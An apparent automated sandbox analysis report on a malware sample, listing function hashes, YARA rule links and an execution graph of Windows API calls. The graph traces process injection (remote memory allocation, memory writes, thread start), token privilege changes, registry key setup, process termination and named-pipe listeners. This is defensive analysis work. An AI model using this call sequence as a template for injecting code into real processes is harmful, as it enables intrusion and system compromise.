                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5be93224df684bc16108d8b4380d1788a5316eba036247acc942e5b4d51cec41
                                                                                                                                                                                                                                                • Instruction ID: 7d5a0349d4ea2ad4037ae2f754a258b7c4dba8f3d24e05938803bc7a795e25eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5be93224df684bc16108d8b4380d1788a5316eba036247acc942e5b4d51cec41
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 633107A2A4E6C78BF74567B448154A87FE0FF96200758C8FAE08D86583ED1ED90D83C1
                                                                                                                                                                                                                                                Function 00007FFAAC59B035 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 67a2f25b44a08f5d4a0203f81a5eae2241196910cb4fcd0bc53bba1a6c5c6c7a
                                                                                                                                                                                                                                                • Instruction ID: 52ad6948d829714b7e7bee8e244c8d235f59572403b64796869701b19f124e0d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67a2f25b44a08f5d4a0203f81a5eae2241196910cb4fcd0bc53bba1a6c5c6c7a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2131B17140C7488FDB55DFA8D88AAEABBF0FF56320F0482AFD089C3552D764A409CB91
                                                                                                                                                                                                                                                Function 00007FFAAC5934D5 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6efbf264852145a3de742577d4a0a4013d58e0ff4ccd46f565bef26b721a88fd
                                                                                                                                                                                                                                                • Instruction ID: 784972a95fd0dd7aacde53f293ee31170f39102e47eb6004979c8558427002b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6efbf264852145a3de742577d4a0a4013d58e0ff4ccd46f565bef26b721a88fd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E521C74698F7C28BF716476C5C660797F64AF97104B4840FAE08C86697E80EDA4D83D2
                                                                                                                                                                                                                                                Function 00007FFAAC59AF51 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4cc8257762133d43c6906991502aef2b029b5b7abb01d73e8355586ed52e9bcc
                                                                                                                                                                                                                                                • Instruction ID: 97eb542194987ed31f5662a4f84260494ee1209b2a23737a7d6553f38869facf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cc8257762133d43c6906991502aef2b029b5b7abb01d73e8355586ed52e9bcc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2213860A8E58B4FE746976888116F937E9DF9B200F0481F6E04EC71C2DD1DD94A83E1
                                                                                                                                                                                                                                                Function 00007FFAAC59353A Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d7140a693ea078f18b9151194218475fad22c1232daffeffbc674bec98d493fb
                                                                                                                                                                                                                                                • Instruction ID: 67c453e4179d6a2706c792d9af617129a7b7e35722716d681a7b84ba532be9f2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7140a693ea078f18b9151194218475fad22c1232daffeffbc674bec98d493fb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B21928788F7C2CFF716876C58160B97F94AF57110B4840EFE08C8A5A7E81ADA0983D2
                                                                                                                                                                                                                                                Function 00007FFAAC59AE41 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 33ade480a36367f853c719c9cbc38cf912891cfc0029ec2948192f040d36b72c
                                                                                                                                                                                                                                                • Instruction ID: 6514eab0c63db18644d683674de0a528f299de9003a9d59d3ed2108f705026a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33ade480a36367f853c719c9cbc38cf912891cfc0029ec2948192f040d36b72c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4210250A2CA565BFB01A7BC8416BE977D5EF49300F5085B5E00DC32C3CE1CA9448BE2
                                                                                                                                                                                                                                                Function 00007FFAAC592811 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3fb27f576649f47982af09aded1c7a453174cc2a286213a198cbf96510eb0e56
                                                                                                                                                                                                                                                • Instruction ID: d16789f5b265f73cf599f3718c81d3088b01b9400ef4d4defb5a750b1de21741
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fb27f576649f47982af09aded1c7a453174cc2a286213a198cbf96510eb0e56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E311B471D4DA4A8FEB94EB6888196ED7BA0EF55300F0041BAE50CC7293DE29990487C1
                                                                                                                                                                                                                                                Function 00007FFAAC591128 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dea814ee76a5f2f25c24244a244d837b047a3f9a4d94f9bfb85efd813f1bf8cf
                                                                                                                                                                                                                                                • Instruction ID: ea63b7f0b1062d6a35e24b5943c23fafdaa99261a2e953af1dde35b801063cc9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dea814ee76a5f2f25c24244a244d837b047a3f9a4d94f9bfb85efd813f1bf8cf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B112663D4DA9A9FE7449BB898160F97BE0EB96340B0480F7E04DC3287D9299A4983C1
                                                                                                                                                                                                                                                Function 00007FFAAC5996C0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ed2c02fbcc4bf719d270833cb36469bbb24e25a0ec7f65a6ae2c368e8f65a409
                                                                                                                                                                                                                                                • Instruction ID: 5d3791f845c3d515f2718d0b90651f2f3873c48b0c9595cb951b98d19daae0fe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed2c02fbcc4bf719d270833cb36469bbb24e25a0ec7f65a6ae2c368e8f65a409
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A11253294CA5A8FFB51E76CD81A5EDBBE4EB86310B0401F2E00DC3292CE185C4643C1
                                                                                                                                                                                                                                                Function 00007FFAAC5936F4 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 829f31b37200d5dbb6d0c5f7b57f807dc9f0fd8d5db37ee03d238c2f8b65f188
                                                                                                                                                                                                                                                • Instruction ID: d1fb9584b6b44f737d4113d321b990edc576afac568c7eaf20073f50657a9fc5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 829f31b37200d5dbb6d0c5f7b57f807dc9f0fd8d5db37ee03d238c2f8b65f188
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D1190A5D4D253CAF756A338C4125A92B999F87360F4886F5E00EC73D3CE2EE5198291
                                                                                                                                                                                                                                                Function 00007FFAAC593731 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 295523f552613576a7b3be8d2db11e01e9d6212f0cace3f1c633a99864c987d6
                                                                                                                                                                                                                                                • Instruction ID: fb33019776a039ece461f71f2b6fda7f45e783e4efed1867c524f52ce2eff7be
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 295523f552613576a7b3be8d2db11e01e9d6212f0cace3f1c633a99864c987d6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2911AFE1C4E693CEF356537CC8511682F68AF97300B4485FAE04D862D3DA1EE5198391
                                                                                                                                                                                                                                                Function 00007FFAAC599841 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3e4ccc36013d3ca67c9f5c67df32b6548ea027c46c9994e90b5752f8d06f224d
                                                                                                                                                                                                                                                • Instruction ID: ba0cba855db4c17242708320c9408c5f9a1c5a0f30f4d060585cea1a7b0d578d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e4ccc36013d3ca67c9f5c67df32b6548ea027c46c9994e90b5752f8d06f224d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 201104B2D09A898FDB45EBA8C86A1FD7BF0EF16301F4401EBD048D7293DA2898048381
                                                                                                                                                                                                                                                Function 00007FFAAC5934A0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9c8e793570bf91925daf0325e61379d3049e2dad7bff3de79a55c44bf96557b9
                                                                                                                                                                                                                                                • Instruction ID: 63e08767f67e7ed1321305928acb8433415677c14a8eb448669342729e9eb63d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c8e793570bf91925daf0325e61379d3049e2dad7bff3de79a55c44bf96557b9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C01D632A48C1E8FEB90E76CD44A9FE77E9EB89300B0041B6E00DD3281CE18690643C1
                                                                                                                                                                                                                                                Function 00007FFAAC5934B0 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 17cc3c523a9c56f891ae24b043d8fea4975cbaba071e7a6ba3b97a7dec652012
                                                                                                                                                                                                                                                • Instruction ID: 815b23d4a5ada5fdca6e6aa0479c1a49a356c544cefa03e860a366dd2878d2f1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17cc3c523a9c56f891ae24b043d8fea4975cbaba071e7a6ba3b97a7dec652012
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11F0F472D1491E8EEB50EBA8D4495FEB7E8EF18305F0004BBE00DD3292DE34990087C1
                                                                                                                                                                                                                                                Function 00007FFAAC594562 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 039fcdb51ad4aff203e19d8aad6163a30655cdd1392afc6470f0bead5772874a
                                                                                                                                                                                                                                                • Instruction ID: 9236df4097cfdaa9e7d69757a51f7627024e139024ed8cbfd9c35c4d60dabd65
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 039fcdb51ad4aff203e19d8aad6163a30655cdd1392afc6470f0bead5772874a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7F0A022B1C9168BBA08676CA4060FD72C6FBCA310B50517AE44FC32C3DE1DAC1602C5
                                                                                                                                                                                                                                                Function 00007FFAAC593A93 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 58bb7550476706eb026965101ef109d94815e6a64e035a508db3b33a65ece219
                                                                                                                                                                                                                                                • Instruction ID: e735a4239fdc0051a2839e7c0185db1e7b6062026f92dd2e2f22893116a8bc53
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58bb7550476706eb026965101ef109d94815e6a64e035a508db3b33a65ece219
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14E09B7264C50D1ED654B665DC46DFB775CEF82334F40117FF50DC1053E915B1228291
                                                                                                                                                                                                                                                Function 00007FFAAC593798 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7addc041f7ae73ecfd5ceb726c43212e472d9a0f39245a572767b633770edb4e
                                                                                                                                                                                                                                                • Instruction ID: f4f8cea15f655b2bd9ca4a5c54b24d683300655d528a627cb5ae2d8e4ae39353
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7addc041f7ae73ecfd5ceb726c43212e472d9a0f39245a572767b633770edb4e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DF0ADB0C8E147CAF356972CC0416A87BA9AF86310F4086B9E04E862C2CF2EA559C380

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:3.7%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:2.2%
                                                                                                                                                                                                                                                Signature Coverage:37.1%
                                                                                                                                                                                                                                                Total number of Nodes:232
                                                                                                                                                                                                                                                Total number of Limit Nodes:23
                                                                                                                                                                                                                                                execution_graph 8540 23eb6a04f51 __scrt_dllmain_exception_filter 8393 7ff6b5ad2b30 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8394 7ff6b5ad2b86 K32EnumProcesses 8393->8394 8395 7ff6b5ad2be3 SleepEx 8394->8395 8396 7ff6b5ad2b9b 8394->8396 8395->8394 8396->8395 8398 7ff6b5ad2538 8396->8398 8399 7ff6b5ad2545 8398->8399 8400 7ff6b5ad2550 8398->8400 8402 7ff6b5ad10c0 8399->8402 8400->8396 8440 7ff6b5ad18a4 OpenProcess 8402->8440 8405 7ff6b5ad14b3 8405->8400 8406 7ff6b5ad1122 OpenProcess 8406->8405 8407 7ff6b5ad113e OpenProcess 8406->8407 8408 7ff6b5ad1161 K32GetModuleFileNameExW 8407->8408 8409 7ff6b5ad11f6 NtQueryInformationProcess 8407->8409 8410 7ff6b5ad117b PathFindFileNameW lstrlenW 8408->8410 8411 7ff6b5ad11ac CloseHandle 8408->8411 8412 7ff6b5ad14aa CloseHandle 8409->8412 8413 7ff6b5ad121d 8409->8413 8410->8411 8414 7ff6b5ad1199 StrCpyW 8410->8414 8411->8409 8415 7ff6b5ad11ba 8411->8415 8412->8405 8413->8412 8416 7ff6b5ad1229 OpenProcessToken 8413->8416 8414->8411 8415->8409 8417 7ff6b5ad11d2 StrCmpIW 8415->8417 8416->8412 8418 7ff6b5ad1247 GetTokenInformation 8416->8418 8417->8412 8417->8415 8419 7ff6b5ad126f GetLastError 8418->8419 8420 7ff6b5ad12ea 8418->8420 8419->8420 8422 7ff6b5ad127a LocalAlloc 8419->8422 8421 7ff6b5ad12f1 CloseHandle 8420->8421 8421->8412 8427 7ff6b5ad1305 8421->8427 8422->8420 8423 7ff6b5ad1290 GetTokenInformation 8422->8423 8424 7ff6b5ad12d8 8423->8424 8425 7ff6b5ad12b8 GetSidSubAuthorityCount GetSidSubAuthority 8423->8425 8426 7ff6b5ad12df LocalFree 8424->8426 8425->8426 8426->8421 8427->8412 8428 7ff6b5ad1394 StrStrA 8427->8428 8429 7ff6b5ad13bc 8427->8429 8428->8427 8430 7ff6b5ad13c1 8428->8430 8429->8412 8430->8412 8431 7ff6b5ad13ec VirtualAllocEx 8430->8431 8431->8412 8432 7ff6b5ad1419 WriteProcessMemory 8431->8432 8432->8412 8433 7ff6b5ad1434 8432->8433 8445 7ff6b5ad2114 8433->8445 8435 7ff6b5ad1454 8435->8412 8436 7ff6b5ad1471 WaitForSingleObject 8435->8436 8439 7ff6b5ad146a CloseHandle 8435->8439 8438 7ff6b5ad1480 GetExitCodeThread 8436->8438 8436->8439 8438->8439 8439->8412 8441 7ff6b5ad18d0 IsWow64Process 8440->8441 8442 7ff6b5ad110e 8440->8442 8443 7ff6b5ad18e2 8441->8443 8444 7ff6b5ad18f0 CloseHandle 8441->8444 8442->8405 8442->8406 8443->8444 8444->8442 8448 7ff6b5ad190c GetModuleHandleA 8445->8448 8449 7ff6b5ad1935 8448->8449 8450 7ff6b5ad192c GetProcAddress 8448->8450 8450->8449 8451 7ff6b5ad2250 8454 7ff6b5ad2264 8451->8454 8478 7ff6b5ad1f24 8454->8478 8457 7ff6b5ad1f24 14 API calls 8458 7ff6b5ad2287 GetCurrentProcessId OpenProcess 8457->8458 8459 7ff6b5ad22a7 OpenProcessToken 8458->8459 8460 7ff6b5ad2319 FindResourceExA 8458->8460 8461 7ff6b5ad2310 CloseHandle 8459->8461 8462 7ff6b5ad22bb LookupPrivilegeValueW 8459->8462 8463 7ff6b5ad2259 ExitProcess 8460->8463 8464 7ff6b5ad2339 SizeofResource 8460->8464 8461->8460 8462->8461 8465 7ff6b5ad22d2 AdjustTokenPrivileges 8462->8465 8464->8463 8466 7ff6b5ad2352 LoadResource 8464->8466 8465->8461 8467 7ff6b5ad230a GetLastError 8465->8467 8466->8463 8468 7ff6b5ad2366 LockResource GetCurrentProcessId 8466->8468 8467->8461 8492 7ff6b5ad17e4 GetProcessHeap HeapAlloc 8468->8492 8470 7ff6b5ad2383 RegCreateKeyExW 8471 7ff6b5ad23c4 ConvertStringSecurityDescriptorToSecurityDescriptorW 8470->8471 8472 7ff6b5ad2481 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 8470->8472 8474 7ff6b5ad23ec RegSetKeySecurity LocalFree 8471->8474 8475 7ff6b5ad2406 RegCreateKeyExW 8471->8475 8473 7ff6b5ad2507 SleepEx 8472->8473 8473->8473 8474->8475 8476 7ff6b5ad2440 GetCurrentProcessId RegSetValueExW RegCloseKey 8475->8476 8477 7ff6b5ad2477 RegCloseKey 8475->8477 8476->8477 8477->8472 8479 7ff6b5ad20f7 8478->8479 8480 7ff6b5ad1f2d StrCpyW StrCatW GetModuleHandleW 8478->8480 8479->8457 8480->8479 8481 7ff6b5ad1f7e GetCurrentProcess K32GetModuleInformation 8480->8481 8482 7ff6b5ad20ee FreeLibrary 8481->8482 8483 7ff6b5ad1fae CreateFileW 8481->8483 8482->8479 8483->8482 8484 7ff6b5ad1fe3 CreateFileMappingW 8483->8484 8485 7ff6b5ad20e5 CloseHandle 8484->8485 8486 7ff6b5ad200c MapViewOfFile 8484->8486 8485->8482 8487 7ff6b5ad202f 8486->8487 8488 7ff6b5ad20dc CloseHandle 8486->8488 8487->8488 8489 7ff6b5ad2048 lstrcmpiA 8487->8489 8491 7ff6b5ad2086 8487->8491 8488->8485 8489->8487 8490 7ff6b5ad2088 VirtualProtect VirtualProtect 8489->8490 8490->8488 8491->8488 8498 7ff6b5ad14d0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 8492->8498 8494 7ff6b5ad187d GetProcessHeap HeapFree 8495 7ff6b5ad1828 8495->8494 8496 7ff6b5ad1849 OpenProcess 8495->8496 8496->8495 8497 7ff6b5ad185f TerminateProcess CloseHandle 8496->8497 8497->8495 8499 7ff6b5ad155d 8498->8499 8500 7ff6b5ad1627 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 8498->8500 8499->8500 8501 7ff6b5ad1572 OpenProcess 8499->8501 8503 7ff6b5ad1612 CloseHandle 8499->8503 8504 7ff6b5ad15c1 ReadProcessMemory 8499->8504 8500->8495 8501->8499 8502 7ff6b5ad158f K32EnumProcessModules 8501->8502 8502->8499 8502->8503 8503->8499 8504->8499 8505 7ff6b5ad2bf0 8506 7ff6b5ad2bfd 8505->8506 8508 7ff6b5ad2c12 Sleep 8506->8508 8509 7ff6b5ad2c1d ConnectNamedPipe 8506->8509 8516 7ff6b5ad1b4c AllocateAndInitializeSid 8506->8516 8508->8506 8510 7ff6b5ad2c7b Sleep 8509->8510 8511 7ff6b5ad2c2c ReadFile 8509->8511 8513 7ff6b5ad2c86 DisconnectNamedPipe 8510->8513 8512 7ff6b5ad2c4f 8511->8512 8511->8513 8523 7ff6b5ad251c 8512->8523 8513->8509 8517 7ff6b5ad1c67 8516->8517 8518 7ff6b5ad1ba9 SetEntriesInAclW 8516->8518 8517->8506 8518->8517 8519 7ff6b5ad1bed LocalAlloc 8518->8519 8519->8517 8520 7ff6b5ad1c01 InitializeSecurityDescriptor 8519->8520 8520->8517 8521 7ff6b5ad1c11 SetSecurityDescriptorDacl 8520->8521 8521->8517 8522 7ff6b5ad1c28 CreateNamedPipeW 8521->8522 8522->8517 8524 7ff6b5ad2531 WriteFile 8523->8524 8525 7ff6b5ad2529 8523->8525 8524->8513 8526 7ff6b5ad10c0 30 API calls 8525->8526 8526->8524 8527 23eb69f2750 8528 23eb69f277e 8527->8528 8529 23eb69f27d9 VirtualAlloc 8528->8529 8530 23eb69f2800 8528->8530 8529->8530 8531 7ff6b5ad21c8 8532 7ff6b5ad21d5 8531->8532 8533 7ff6b5ad1b4c 6 API calls 8532->8533 8534 7ff6b5ad21f5 ConnectNamedPipe 8532->8534 8535 7ff6b5ad21ea Sleep 8532->8535 8533->8532 8536 7ff6b5ad2204 ReadFile 8534->8536 8537 7ff6b5ad2239 Sleep 8534->8537 8535->8532 8538 7ff6b5ad2244 DisconnectNamedPipe 8536->8538 8539 7ff6b5ad2227 8536->8539 8537->8538 8538->8534 8539->8538 8541 7ff6b5ad2558 8542 7ff6b5ad2732 8541->8542 8543 7ff6b5ad258a 8541->8543 8544 7ff6b5ad2740 8542->8544 8545 7ff6b5ad2976 ReadFile 8542->8545 8546 7ff6b5ad26be GetProcessHeap HeapAlloc K32EnumProcesses 8543->8546 8547 7ff6b5ad2590 8543->8547 8548 7ff6b5ad296c 8544->8548 8549 7ff6b5ad2749 8544->8549 8556 7ff6b5ad29a0 8545->8556 8559 7ff6b5ad262b 8545->8559 